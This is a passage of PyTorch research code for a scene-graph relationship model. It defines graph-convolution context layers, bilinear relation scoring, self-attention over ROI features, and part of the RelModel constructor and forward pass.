x = F.elu(self.gc[num_layer](ctx_feat, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
'''
spare_adj_mat_re = torch.zeros([im_inds.size(0), im_inds.size(0)]).cuda(ctx_feat.get_device(),async=True)
spare_adj_mat_re = Variable(spare_adj_mat_re)
spare_adj_mat_re[rel_inds[:, 2], rel_inds[:, 1]] = adj_mat_t
spare_adj_mat_re = self.adj_to_Laplacian(spare_adj_mat_re,type=self.gcn_adj_type)
x_re = F.relu(self.gc_re[num_layer](ctx_feat, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
'''
x = F.relu(self.gc2[num_layer](x, spare_adj_mat))
x = F.dropout(x, self.dropout_rate, training=self.training)
x_re = F.relu(self.gc2_re[num_layer](x_re, spare_adj_mat_re))
x_re = F.dropout(x_re, self.dropout_rate, training=self.training)
'''
return x, x
def bilinear_score_graph(self, sub, obj, num=0):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
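        # The "bilinear" score is implemented in factorized form: an elementwise (Hadamard) product of the
        # two inputs followed by a bias-free linear layer, which keeps the parameter count at pooling_dim x 2.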
prod_rep_graph = sub * obj
if num == 0:
rel_dists_graph = self.graph_bilinear(prod_rep_graph)
#rel_dists_graph = F.dropout(rel_dists_graph, self.dropout_rate, training=self.training)
if num == 1:
rel_dists_graph = self.graph_bilinear_1(prod_rep_graph)
#rel_dists_graph = F.dropout(rel_dists_graph, self.dropout_rate, training=self.training)
return rel_dists_graph
def bilinear_score_graph_obj(self, sub, obj):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
rel_dists_graph = self.obj_graph_bilinear(prod_rep_graph)
#rel_dists_graph = F.dropout(rel_dists_graph, self.dropout_rate, training=self.training)
return rel_dists_graph
def mul_ctx_T(self, obj_feats, im_inds, num_obj_per):
'''
num_obj_per = im_inds[:,None] == im_inds[None,:]
num_obj_per = num_obj_per.type_as(im_inds)
num_obj_per = num_obj_per.sum(-1)
'''
mul_dist, _, mul_state = self.mul_rnn(obj_feats, obj_num=num_obj_per, im_inds=im_inds)
return mul_dist, mul_state
def get_union_box(self, rois, union_inds):
im_inds = rois[:, 0][union_inds[:, 0]]
union_rois = torch.cat((
im_inds[:, None],
torch.min(rois[:, 1:3][union_inds[:, 0]], rois[:, 1:3][union_inds[:, 1]]),
torch.max(rois[:, 3:5][union_inds[:, 0]], rois[:, 3:5][union_inds[:, 1]]),
), 1)
return union_rois
def max_pooling_image(self, obj_dist, num_box):
output = []
pre_i = 0
for i in num_box.data.cpu().numpy():
i = int(i)
output.append(((obj_dist[pre_i:pre_i+i].max(0)[0])).clone())
            pre_i += i  # accumulate the offset so each image's block of rows is sliced from the right place
return torch.stack(output)
def forward(self, obj_fmaps, obj_logits, im_inds, obj_labels=None,
box_priors=None, boxes_per_cls=None, obj_feat_im_inds=None, f_map=None, union_feat=None,
rel_inds=None, rel_inds_offset=None, num_box=None, num_obj_per=None,
gt_adj_mat=None, rel_label=None, label_prior=None):
"""
Forward pass through the object and edge context
:param obj_fmaps: shape: [num_boxes, dim_feature]
:param obj_logits: shape: [num_boxes, num_classes] before softmax
:param im_inds: shape: [num_boxes, 1] each is img_ind
:param obj_labels: shape: [num_boxes, 1] each is box class
:param box_priors: shape: [num_boxes, 4] each is box position
:return:
"""
obj_logits_softmax = F.softmax(obj_logits, dim=1)
#if self.mode == 'predcls':
# obj_logits = Variable(to_onehot(obj_labels.data, self.num_classes))
# obj_logits_softmax = obj_logits
obj_embed = obj_logits_softmax @ self.obj_embed.weight
obj_embed = F.dropout(obj_embed, self.dropout_rate, training=self.training)
pos_embed = self.pos_embed(Variable(center_size(box_priors)))
obj_pre_rep = torch.cat((obj_fmaps, obj_embed, pos_embed), 1)
adj_dist_owbias_rel = None
adj_dist_owbias_obj = None
obj_ctx_gcn = None
if self.with_gcn and self.where_gcn == 'parall':
if (not self.with_gt_adj_mat) or self.type_gcn == 'gat':
adj_pre = obj_pre_rep
if self.mode == 'sgdet':
adj_obj_preds = obj_logits.detach().max(1)[1]
else:
if self.training or self.mode == 'predcls':
adj_obj_preds = obj_labels
else:
adj_obj_preds = obj_logits[:, 1:].max(1)[1] + 1
adj_dist_owbias_obj = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre, rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=adj_obj_preds, num=1,
)
adj_dis_softmax_obj = F.softmax(adj_dist_owbias_obj, -1)[:, 1]
if self.with_gt_adj_mat:
if self.type_gcn == 'gat':
adj_dis_softmax_obj = gt_adj_mat * adj_dis_softmax_obj
else:
adj_dis_softmax_obj = gt_adj_mat
obj_ctx_gcn \
= self.obj_gcn(obj_pre_rep,
im_inds=im_inds,
rel_inds=rel_inds,
adj_mat=adj_dis_softmax_obj
)
if self.nl_obj > 0 and self.mode != 'predcls_nongtbox':
obj_dists2, obj_preds_nozeros, obj_preds_zeros, \
obj_ctx, decoder_rep, adj_dist_owbias_obj_t = self.obj_ctx(
obj_feats = obj_pre_rep,
obj_dists = obj_logits,
im_inds = im_inds,
obj_labels = obj_labels,
box_priors = box_priors,
boxes_per_cls = boxes_per_cls,
obj_ctx_gcn=obj_ctx_gcn,
rel_inds=rel_inds,
union_feat=union_feat,
rel_inds_offset=rel_inds_offset,
label_prior=label_prior,
)
if adj_dist_owbias_obj_t is not None:
adj_dist_owbias_obj = adj_dist_owbias_obj_t
if self.ch_res:
obj_ctx = torch.cat([obj_ctx, decoder_rep],-1)
mul_dist = self.max_pooling_image(F.softmax(obj_dists2, -1), num_box)
elif self.with_gcn:
obj_dists2 = self.decoder_lin(obj_ctx_gcn)
obj_preds = obj_dists2[:, 1:].max(-1)[1] + 1
obj_preds_nozeros = obj_preds
obj_preds_zeros = obj_dists2.max(-1)[1]
else:
# UNSURE WHAT TO DO HERE
if self.mode == 'predcls' or self.mode == 'predcls_nongtbox':
obj_dists2 = Variable(to_onehot(obj_labels.data, self.num_classes))
if (self.mode == 'sgdet') and not self.training:
# NMS here for baseline
probs = F.softmax(obj_dists2, 1)
nms_mask = obj_dists2.data.clone()
nms_mask.zero_()
for c_i in range(1, obj_dists2.size(1)):
scores_ci = probs.data[:, c_i]
boxes_ci = boxes_per_cls.data[:, c_i]
keep = apply_nms(scores_ci, boxes_ci,
pre_nms_topn=scores_ci.size(0), post_nms_topn=scores_ci.size(0),
nms_thresh=0.3)
nms_mask[:, c_i][keep] = 1
obj_preds_nozeros = Variable(nms_mask * probs.data, volatile=True)[:,1:].max(1)[1] + 1
obj_preds_zeros = Variable(nms_mask * probs.data, volatile=True)[:, :].max(1)[1]
else:
obj_preds_nozeros = obj_labels if obj_labels is not None else obj_dists2[:,1:].max(1)[1] + 1
obj_preds_zeros = obj_labels if obj_labels is not None else obj_dists2[:, :].max(1)[1]
if self.mode == 'detclass':
return obj_dists2, obj_preds_nozeros, obj_preds_zeros, None, None, None, \
None, None, adj_dist_owbias_obj, None, None, None, None
adj_dis_softmax = None
if self.with_adj_mat and self.where_gcn == 'parall':
adj_pre = obj_ctx
if self.pass_embed_togcn:
pred_embed3 = self.obj_embed3(obj_preds_zeros)
pred_embed3 = F.dropout(pred_embed3, self.dropout_rate, training=self.training)
adj_pre = torch.cat((pred_embed3, adj_pre), -1)
if not self.with_gt_adj_mat:
adj_dist_owbias_rel = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre, rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=obj_preds_zeros, num=0,
)
if self.with_gt_adj_mat:
adj_dis_softmax_rel = gt_adj_mat
else:
adj_dis_softmax_rel = F.softmax(adj_dist_owbias_rel, -1)[:, 1]
edge_ctx = None
obj_feat_att = None
obj_feat_att_w = None
rel_inds_nms = rel_inds
rel_label_nms = rel_label
keep_union = None
rel_dists = None
if self.mode == 'sgdet':
edge_obj_pred = obj_preds_nozeros.clone()
'''
if self.training :
edge_obj_pred = obj_labels.clone()
else:
edge_obj_pred = obj_dists2.detach().max(1)[1]
'''
else:
edge_obj_pred = obj_preds_nozeros.clone()
if self.nl_edge > 0:
edge_ctx = self.edge_ctx(
torch.cat((obj_fmaps, obj_ctx), 1) if self.pass_in_obj_feats_to_edge else obj_ctx,
obj_dists=obj_dists2.detach(), # Was previously obj_logits.
im_inds=im_inds,
obj_preds=edge_obj_pred, #obj_preds_zeros, #obj_preds_zeros obj_preds_nozeros
box_priors=box_priors
)
elif self.nl_edge == 0:
edge_ctx = obj_ctx
edge_sub_ctx = None
edge_obj_ctx = None
if self.with_gcn:
#gtc_input = torch.cat([edge_ctx,f_mean_map],-1)
gtc_input = obj_ctx
if self.where_gcn == 'stack':
if self.with_adj_mat :
gtc_input = edge_ctx
adj_pre = edge_ctx
if self.mode == 'sgdet':
'''
adj_obj_preds = obj_preds_nozeros.clone()
'''
if self.training:
adj_obj_preds = obj_labels.clone()
#adj_obj_preds = obj_preds_nozeros.clone()
else:
adj_obj_preds = obj_dists2.detach().max(1)[1]
#adj_obj_preds = obj_preds_zeros
#adj_obj_preds = obj_preds_nozeros.clone()
else:
adj_obj_preds = obj_preds_nozeros.clone()
if not self.with_gt_adj_mat:
#print('obj_preds_nozeros',obj_preds_nozeros)
adj_dist_owbias_rel = self.from_pre_to_mat(obj_pre=adj_pre, sub_pre=adj_pre,
rel_inds_graph=rel_inds,
vr_graph=union_feat,
rel_inds_offset_graph=rel_inds_offset,
obj_preds=adj_obj_preds, num=0,
)
if self.with_gt_adj_mat:
adj_dis_softmax_rel = gt_adj_mat
else:
adj_dis_softmax_rel = F.softmax(adj_dist_owbias_rel, -1)[:, 1]
''' '''
if self.pass_in_obj_feats_to_gcn:
pred_embed3 = self.obj_embed3(obj_preds_nozeros)
pred_embed3 = F.dropout(pred_embed3, self.dropout_rate, training=self.training)
obj_pre_rep3 = torch.cat((obj_fmaps, pred_embed3, pos_embed), 1)
gtc_input = torch.cat((obj_pre_rep3, gtc_input), -1)
if self.pass_embed_togcn:
pred_embed3 = self.obj_embed3(obj_preds_nozeros)
pred_embed3 = F.dropout(pred_embed3, self.dropout_rate, training=self.training)
gtc_input = torch.cat((pred_embed3, gtc_input), -1)
sub_gcn_ctx, obj_gcn_ctx = self.gcn_ctx(
gtc_input,
adj_mat=adj_dis_softmax_rel,
im_inds=im_inds,
rel_inds=rel_inds,
rel_inds_offset=rel_inds_offset,
num_layer=0,
obj_preds=obj_preds_nozeros,
)
edge_sub_ctx = torch.cat([sub_gcn_ctx, edge_ctx], -1)
edge_obj_ctx = torch.cat([obj_gcn_ctx, edge_ctx], -1)
edge_ctx = sub_gcn_ctx + obj_gcn_ctx + edge_ctx
return obj_dists2, obj_preds_nozeros, obj_preds_zeros, edge_ctx, edge_sub_ctx, edge_obj_ctx, \
obj_feat_att, obj_feat_att_w, \
adj_dist_owbias_rel, adj_dist_owbias_obj, keep_union, rel_inds_nms, \
rel_dists,mul_dist
class RelModel(nn.Module):
"""
RELATIONSHIPS
"""
def __init__(self, classes, rel_classes, mode='sgdet', num_gpus=1, use_vision=True, require_overlap_det=True,
embed_dim=200, hidden_dim=256, pooling_dim=2048,
nl_obj=1, nl_edge=2, nl_adj=2, nl_mul=0, use_resnet=False, order='confidence', thresh=0.01,
use_proposals=False, pass_in_obj_feats_to_decoder=True, pass_in_obj_feats_to_gcn =False,
pass_in_obj_feats_to_edge=True, pass_embed_togcn=False,
rec_dropout=0.0, use_bias=True, use_tanh=True,
limit_vision=True,attention_dim=256, adj_embed_dim=256, with_adj_mat=False,
max_obj_num=65, bg_num_graph=-1, bg_num_rel=-1, neg_time=0,
adj_embed=False, mean_union_feat=False,
ch_res=False, with_att=False, att_dim=512,
with_gcn=False, fb_thr=0.5, with_biliner_score=False,
gcn_adj_type='hard', where_gcn = 'parall', with_gt_adj_mat=False,type_gcn='normal',
edge_ctx_type='obj', nms_union=False, cosine_dis=False, test_alpha=0.5,
ext_feat=False, *args, **kwargs
):
"""
:param classes: Object classes
:param rel_classes: Relationship classes. None if were not using rel mode
:param mode: (sgcls, predcls, or sgdet)
:param num_gpus: how many GPUS 2 use
:param use_vision: Whether to use vision in the final product
:param require_overlap_det: Whether two objects must intersect
:param embed_dim: Dimension for all embeddings
:param hidden_dim: LSTM hidden size
:param obj_dim:
"""
super(RelModel, self).__init__()
self.classes = classes
self.rel_classes = rel_classes
self.num_gpus = num_gpus
assert mode in MODES
self.mode = mode
self.pooling_size = 7
self.embed_dim = embed_dim
self.hidden_dim = hidden_dim
self.obj_dim = 2048 if use_resnet else 4096
self.pooling_dim = pooling_dim
self.use_resnet = use_resnet
self.use_bias = use_bias
self.use_vision = use_vision
self.use_tanh = use_tanh
self.limit_vision=limit_vision
self.require_overlap = require_overlap_det and self.mode == 'sgdet'
self.with_adj_mat = with_adj_mat
self.bg_num_graph = bg_num_graph
self.bg_num_rel = bg_num_rel
self.max_obj_num = max_obj_num
self.adj_embed_dim = adj_embed_dim
self.nl_adj = nl_adj
self.nl_mul = nl_mul
self.ch_res = ch_res
self.att_dim = att_dim
self.fb_thr = fb_thr
self.where_gcn = where_gcn
self.dropout_rate = rec_dropout
self.with_biliner_score = with_biliner_score
self.with_gt_adj_mat = with_gt_adj_mat
self.nl_obj = nl_obj
self.with_gcn = with_gcn
self.with_att = with_att
self.type_gcn = type_gcn
self.edge_ctx_type = edge_ctx_type
self.nms_union = nms_union
self.with_adaptive = False
self.with_cosine_dis = cosine_dis
self.test_alpha = test_alpha
self.ext_feat = ext_feat
if self.with_cosine_dis:
print('With_cosine_dis ')
self.obj_glove_vec = obj_edge_vectors(self.classes, wv_dim=self.embed_dim)
self.rel_glove_vec = obj_edge_vectors(self.rel_classes, wv_dim=self.embed_dim)
self.detector = ObjectDetector(
classes=classes,
mode=('proposals' if use_proposals else 'refinerels') if mode == 'sgdet' or mode == 'predcls_nongtbox' else 'gtbox',
thresh=thresh,
max_per_img=64,
bg_num_graph=self.bg_num_graph,
bg_num_rel=self.bg_num_rel,
with_gt_adj_mat=with_gt_adj_mat,
backbone_type=('resnet' if use_resnet else 'vgg')
)
if self.mode == 'detclass' and nl_obj == 0 and not with_gcn:
return
self.context = LinearizedContext(self.classes, self.rel_classes, mode=self.mode,
embed_dim=self.embed_dim, hidden_dim=self.hidden_dim,
pooling_dim=self.pooling_dim,
obj_dim=self.obj_dim, nl_mul=nl_mul,
nl_obj=nl_obj, nl_edge=nl_edge, nl_adj=nl_adj,
dropout_rate=rec_dropout,
order=order,
pass_in_obj_feats_to_decoder=pass_in_obj_feats_to_decoder,
pass_in_obj_feats_to_edge=pass_in_obj_feats_to_edge,
pass_in_obj_feats_to_gcn=pass_in_obj_feats_to_gcn,
pass_embed_togcn=pass_embed_togcn,
attention_dim=attention_dim, adj_embed_dim=self.adj_embed_dim,
with_adj_mat=with_adj_mat,adj_embed=adj_embed,
mean_union_feat=mean_union_feat,ch_res=ch_res,
use_bias = use_bias,
use_vision = use_vision,
use_tanh = use_tanh,
limit_vision = limit_vision,
bg_num_rel=bg_num_rel,
bg_num_graph=bg_num_graph,
with_gcn=with_gcn,
fb_thr=fb_thr,
with_biliner_score=with_biliner_score,
gcn_adj_type=gcn_adj_type,
where_gcn=where_gcn,
with_gt_adj_mat=with_gt_adj_mat,
type_gcn=type_gcn,
edge_ctx_type=edge_ctx_type,
nms_union=nms_union,
)
# Image Feats (You'll have to disable if you want to turn off the features from here)
#self.union_boxes = UnionBoxesAndFeats(pooling_size=self.pooling_size, stride=16,
# dim=1024 if use_resnet else 512)
if use_resnet:
roi_fmap = load_resnet(pretrained=False)[1]
if pooling_dim != 2048:
roi_fmap.append(nn.Linear(2048, pooling_dim))
self.roi_fmap = nn.Sequential(*roi_fmap)
self.roi_fmap_obj = load_resnet(pretrained=False)[1]
self.compress_union = None
self.compress = None
'''
roi_fmap = [Flattener(),
nn.Sequential(
nn.Linear(256 * 7 * 7, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05),
nn.Linear(2048, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05))]
if pooling_dim != 2048:
roi_fmap.append(nn.Linear(2048, pooling_dim))
self.roi_fmap = nn.Sequential(*roi_fmap)
self.roi_fmap_obj = nn.Sequential(
nn.Linear(256 * 7 * 7, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05),
nn.Linear(2048, 2048),
nn.SELU(inplace=True),
nn.AlphaDropout(p=0.05))
self.compress = nn.Sequential(
nn.Conv2d(1024, 256, kernel_size=1),
nn.ReLU(inplace=True),
nn.BatchNorm2d(256),
)
self.compress_union = nn.Sequential(
nn.Conv2d(1024, 256, kernel_size=1),
nn.ReLU(inplace=True),
nn.BatchNorm2d(256),
)
'''
else:
roi_fmap = [
Flattener(),
load_vgg(use_dropout=False, use_relu=False, use_linear=pooling_dim == 4096, pretrained=False).classifier,
]
if pooling_dim != 4096:
roi_fmap.append(nn.Linear(4096, pooling_dim))
self.roi_fmap = nn.Sequential(*roi_fmap)
self.roi_fmap_obj = load_vgg(pretrained=False).classifier
self.compress_union = None
self.compress = None
self.union_boxes = UnionBoxesAndFeats(pooling_size=self.pooling_size, stride=16,
dim=1024 if use_resnet else 512, compress_union=self.compress_union)
###################################
post_lstm_in_dim = self.hidden_dim
if self.with_gcn :
post_lstm_in_dim += self.hidden_dim
#post_lstm_in_dim = self.hidden_dim
if self.mode == 'detclass':
return
self.post_obj_lstm = nn.Linear(post_lstm_in_dim, self.pooling_dim)
self.post_sub_lstm = nn.Linear(post_lstm_in_dim, self.pooling_dim)
# Initialize to sqrt(1/2n) so that the outputs all have mean 0 and variance 1.
# (Half contribution comes from LSTM, half from embedding.
# In practice the pre-lstm stuff tends to have stdev 0.1 so I multiplied this by 10.
self.post_obj_lstm.weight = torch.nn.init.xavier_normal(self.post_obj_lstm.weight, gain=1.0)
self.post_sub_lstm.weight = torch.nn.init.xavier_normal(self.post_sub_lstm.weight, gain=1.0)
'''
self.post_obj_lstm.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_obj_lstm.bias.data.zero_()
self.post_sub_lstm.weight.data.normal_(0, 10.0 * math.sqrt(1.0 / self.hidden_dim))
self.post_sub_lstm.bias.data.zero_()
'''
if nl_edge == 0:
self.post_emb = nn.Embedding(self.num_classes, self.pooling_dim*2)
self.post_emb.weight.data.normal_(0, math.sqrt(1.0))
if self.with_adaptive:
self.adp_bilinear = nn.Linear(self.pooling_dim, 2, bias=False)
self.adp_bilinear.weight = torch.nn.init.xavier_normal(self.adp_bilinear.weight, gain=1.0)
if with_biliner_score:
self.rel_bilinear = nn.Linear(self.pooling_dim, self.num_rels, bias=False)
self.rel_bilinear.weight = torch.nn.init.xavier_normal(self.rel_bilinear.weight, gain=1.0)
else:
self.rel_compress = nn.Linear(self.pooling_dim, self.num_rels, bias=True)
self.rel_compress.weight = torch.nn.init.xavier_normal(self.rel_compress.weight, gain=1.0)
if self.use_bias and self.edge_ctx_type != 'union':
self.freq_bias = FrequencyBias(with_bg=bg_num_rel!=0)
if with_att:
self.query_conv = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8, kernel_size=1)
self.key_conv = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8, kernel_size=1)
self.value_conv = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim, kernel_size=1)
'''
self.query_conv = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.key_conv = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.value_conv = nn.Linear(self.pooling_dim, self.pooling_dim, bias=True)
'''
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1) #
self.graph_att = None
'''
self.query_conv_1 = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.key_conv_1 = nn.Linear(self.pooling_dim, self.pooling_dim // 8, bias=True)
self.value_conv_1 = nn.Linear(self.pooling_dim, self.pooling_dim, bias=True)
'''
self.query_conv_1 = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8,
kernel_size=1)
self.key_conv_1 = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim // 8, kernel_size=1)
self.value_conv_1 = nn.Conv2d(in_channels=self.pooling_dim, out_channels=self.pooling_dim, kernel_size=1)
self.gamma_1 = nn.Parameter(torch.zeros(1))
self.softmax_1 = nn.Softmax(dim=-1) #
self.rel_att = None
@property
def num_classes(self):
return len(self.classes)
@property
def num_rels(self):
return len(self.rel_classes)
def self_attention_layer_graph(self, x):
"""
inputs :
x : input feature maps( B X C X W X H)
returns :
out : self attention value + input feature
attention: B X N X N (N is Width*Height)
"""
m_batchsize, C, width, height = x.size()
proj_query = self.query_conv(x).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key = self.key_conv(x).view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax(energy) # BX (N) X (N)
proj_value = self.value_conv(x).view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma * out + x
'''
proj_query_t = self.query_conv(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_query = proj_query_t.view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key_t = self.key_conv(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_key = proj_key_t.view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax(energy) # BX (N) X (N)
proj_value_t = self.value_conv(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_value = proj_value_t.view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma * out + x
'''
return out.mean(3).mean(2), attention
def self_attention_layer_rel(self, x):
"""
inputs :
x : input feature maps( B X C X W X H)
returns :
out : self attention value + input feature
attention: B X N X N (N is Width*Height)
"""
m_batchsize, C, width, height = x.size()
proj_query = self.query_conv_1(x).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key = self.key_conv_1(x).view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax_1(energy) # BX (N) X (N)
proj_value = self.value_conv_1(x).view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma_1 * out + x
'''
m_batchsize, C, width, height = x.size()
proj_query_t = self.query_conv_1(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_query = proj_query_t.view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X CX(N)
proj_key_t = self.key_conv_1(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_key = proj_key_t.view(m_batchsize, -1, width * height) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax_1(energy) # BX (N) X (N)
proj_value_t = self.value_conv_1(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2).contiguous()
proj_value = proj_value_t.view(m_batchsize, -1, width * height) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(m_batchsize, C, width, height)
out = self.gamma_1 * out + x
'''
return out.mean(3).mean(2), attention
def visual_rep(self, features, rois, pair_inds, type='graph'):
"""
Classify the features
:param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4]
:param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1].
:param pair_inds inds to use when predicting
:return: score_pred, a [num_rois, num_classes] array
box_pred, a [num_rois, num_classes, 4] array
"""
assert pair_inds.size(1) == 2
uboxes = self.union_boxes(features, rois, pair_inds)
#return self.roi_fmap(uboxes)
''' '''
if not self.use_resnet:
return self.roi_fmap(uboxes)
else:
#print('uboxes: ',uboxes.size())
roi_fmap_t = self.roi_fmap(uboxes)
#print('roi_fmap_t: ',roi_fmap_t.size())
if self.with_att:
if type == 'graph':
output, self.graph_att = self.self_attention_layer_graph(roi_fmap_t)
return output
if type == 'rel':
output, self.rel_att = self.self_attention_layer_rel(roi_fmap_t)
return output
else:
return roi_fmap_t.mean(3).mean(2)
def get_rel_inds(self, rel_labels, rel_labels_offset, im_inds, box_priors):
# Get the relationship candidates
if self.training:
rel_inds = rel_labels[:, :3].data.clone()
rel_inds_offset = rel_labels_offset[:, :3].data.clone()
else:
rel_cands = im_inds.data[:, None] == im_inds.data[None]
rel_cands.view(-1)[diagonal_inds(rel_cands)] = 0
# Require overlap for detection
if self.require_overlap:
rel_cands = rel_cands & (bbox_overlaps(box_priors.data,
box_priors.data) > 0)
            # if there are fewer than 100 candidates then we might as well add some?
amt_to_add = 100 - rel_cands.long().sum()
rel_cands = rel_cands.nonzero()
if rel_cands.dim() == 0:
rel_cands = im_inds.data.new(1, 2).fill_(0)
rel_inds = torch.cat((im_inds.data[rel_cands[:, 0]][:, None], rel_cands), 1)
rel_inds_offset = rel_inds
return rel_inds, rel_inds_offset
def obj_feature_map(self, features, rois):
"""
Gets the ROI features
:param features: [batch_size, dim, IM_SIZE/4, IM_SIZE/4] (features at level p2)
:param rois: [num_rois, 5] array of [img_num, x0, y0, x1, y1].
:return: [num_rois, #dim] array
"""
'''
feature_pool = RoIAlignFunction(self.pooling_size, self.pooling_size, spatial_scale=1 / 16)(
self.compress(features) if self.use_resnet else features, rois)
return self.roi_fmap_obj(feature_pool.view(rois.size(0), -1))
'''
feature_pool = RoIAlignFunction(self.pooling_size, self.pooling_size, spatial_scale=1 / 16)(
features, rois)
if not self.use_resnet:
return self.roi_fmap_obj(feature_pool.view(rois.size(0), -1))
else:
return self.roi_fmap_obj(feature_pool).mean(3).mean(2)
def bilinear_score(self, sub, obj):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
rel_dists_graph = self.rel_bilinear(prod_rep_graph)
return rel_dists_graph
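    # Note on the two scorers: bilinear_score above fuses subject and object representations by an
    # element-wise product and maps the result to relation logits via rel_bilinear; adp_bilinear_score
    # below applies the same pattern through adp_bilinear, and its output is later used as a per-pair
    # weighting between the visual relation logits and the frequency-bias term.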
def adp_bilinear_score(self, sub, obj):
'''
Args:
obj: num_rel, dim_hid
sub: num_rel, dim_hid
Returns:
'''
prod_rep_graph = sub * obj
rel_dists_graph = self.adp_bilinear(prod_rep_graph)
return rel_dists_graph
def forward(self, ids, x, im_sizes, image_offset,
gt_boxes=None, gt_classes=None, gt_adj_mat=None, gt_rels=None,
gt_mul_label=None, gt_mul_rel=None, gt_mul_label_num=None,
num_box=None,
proposals=None,
ae_adj_mat_rel=None,
ae_adj_mat_obj=None,
ae_pred_rel_inds=None,
train_anchor_inds=None,
return_fmap=False):
"""
Forward pass for detection
:param x: Images@[batch_size, 3, IM_SIZE, IM_SIZE]
:param im_sizes: A numpy array of (h, w, scale) for each image.
:param image_offset: Offset onto what image we're on for MGPU training (if single GPU this is 0)
:param gt_boxes:
Training parameters:
:param gt_boxes: [num_gt, 4] GT boxes over the batch.
:param gt_classes: [num_gt, 2] gt boxes where each one is (img_id, class)
:param train_anchor_inds: a [num_train, 2] array of indices for the anchors that will
be used to compute the training loss. Each (img_ind, fpn_idx)
:return: If train:
scores, boxdeltas, labels, boxes, boxtargets, rpnscores, rpnboxes, rellabels
if test:
prob dists, boxes, img inds, maxscores, classes
"""
result = self.detector(x, im_sizes, image_offset, gt_boxes, gt_classes, gt_rels, proposals,
train_anchor_inds, return_fmap=True)
if self.mode == 'detclass' and self.nl_obj == 0 and not self.with_gcn:
if self.training:
return result
else:
rm_obj_softmax = F.softmax(result.rm_obj_dists, dim=-1)
obj_preds = rm_obj_softmax[:, 1:].max(-1)[1] + 1
twod_inds = arange(obj_preds.data) * self.num_classes + obj_preds.data
obj_scores = F.softmax(result.rm_obj_dists, dim=-1)
obj_preds = obj_preds.cpu().data.numpy()
rm_box_priors = result.rm_box_priors.cpu().data.numpy()
return rm_box_priors, obj_preds, obj_scores
if result.is_none():
            raise ValueError("Detector returned an empty result")
im_inds = result.im_inds - image_offset
obj_feat_im_inds = im_inds
boxes = result.rm_box_priors
if self.mode == 'sgdet':
max_num_bg = int(max(self.bg_num_graph, self.bg_num_rel))
if self.bg_num_graph == -1 or self.bg_num_rel == -1:
max_num_bg = -1
rel_labels_fg, result.gt_adj_mat_graph, rel_labels_offset_fg \
= rel_assignments(im_inds.data, boxes.data, result.rm_obj_labels.data,
gt_boxes.data, gt_classes.data, gt_rels.data,
image_offset, filter_non_overlap=True,
num_sample_per_gt=1, max_obj_num=self.max_obj_num,
time_bg=0, time_fg=1)
rel_labels_bg, result.gt_adj_mat_rel, rel_labels_offset_bg \
= rel_assignments(im_inds.data, boxes.data, result.rm_obj_labels.data,
gt_boxes.data, gt_classes.data, gt_rels.data,
image_offset, filter_non_overlap=True,
num_sample_per_gt=1, max_obj_num=self.max_obj_num,
time_bg=max_num_bg, time_fg=0)
max_num_bg = (rel_labels_bg.shape[0] / (1.0 * rel_labels_fg.shape[0]))
num_bg_graph = int((self.bg_num_graph / (1.0 * max_num_bg)) * rel_labels_bg.shape[0])
num_bg_rel = int((self.bg_num_rel / (1.0 * max_num_bg)) * rel_labels_bg.shape[0])
if self.bg_num_graph == -1:
